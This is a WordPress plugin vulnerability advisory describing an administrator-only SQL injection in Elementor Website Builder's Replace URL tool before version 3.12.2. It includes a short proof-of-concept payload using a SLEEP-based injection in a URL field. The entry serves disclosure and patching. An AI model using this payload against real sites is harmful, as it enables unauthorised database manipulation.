WordPress Plugin Vulnerabilities
Elementor Website Builder < 3.12.2 - Admin+ SQLi
Description
The plugin does not properly sanitize and escape the Replace URL parameter in the Tools module before using it in a SQL statement, leading to a SQL injection exploitable by users with the Administrator role.
Proof of Concept
1. Go to Elementor > Tools > Replace URL 2. Fill the first field with `http://localhost:8000/` 3. Fill the second field with `http://localhost:8000/?test'),meta_key='key4'where+meta_id=SLEEP(2);#` 4. Note the additional time taken by the request, demonstrating the SQL injection vulnerability.
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Sanjay Das
Submitter
Sanjay Das
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-05-02 (about 7 months ago)
Added
2023-05-02 (about 6 months ago)
Last Updated
2023-05-02 (about 6 months ago)